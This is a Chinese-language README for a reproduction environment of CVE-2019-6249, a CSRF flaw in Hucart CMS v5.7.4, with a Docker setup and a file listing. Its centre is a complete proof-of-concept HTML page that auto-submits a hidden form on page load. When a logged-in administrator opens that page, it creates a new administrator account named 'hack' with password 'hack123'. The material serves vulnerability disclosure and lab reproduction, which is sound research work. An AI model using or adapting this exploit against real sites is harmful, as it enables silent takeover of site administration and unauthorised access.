CVE-2019-6249 Hucart cms 复现环境# CVE-2019-6249_Hucart cms
## 一、漏洞摘要
> 漏洞名称: Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号 \
> 上报日期: 2019-01-13 \
> 漏洞发现者: AllenChen(520allen@gmail.com) \
> 产品首页: http://www.hucart.com/ \
> 软件链接: http://www.hucart.com/ \
> 版本: v5.7.4\
> CVE编号: CVE-2019-6249\
## 二、漏洞概述
Hucart cms v5.7.4版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加一个名为hack的管理员账号。
## 三、利用代码
exp代码如下:
增加一个名为hack密码为hack123的管理员账号。
```
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='admin@hack.com' />";
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";
fields += "<input type='hidden' name='adm_enabled' value='1' />";
fields += "<input type='hidden' name='act_type' value='add' />";
fields += "<input type='hidden' name='adm_id' value='' />";
var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>
```
## 四、参考信息
- CVE中文申请网:http://www.iwantacve.cn/index.php/archives/109/
- CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
- exploit-db:https://www.exploit-db.com/exploits/46149
## 五、环境复现(Docker)
**在Docker环境中,运行以下命令**
```
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart
```
#### 原创 EMail:NMTech@aliyun.com
[4.0K] /data/pocs/2e5ca6dba2aa6d36fba7c8fc50e1910715a50605
├── [3.3K] dockerfile
├── [ 16M] HuCart.zip
├── [ 34K] LICENSE
├── [ 11M] php-5.2.17.tar.gz
└── [2.0K] README.md
0 directories, 5 files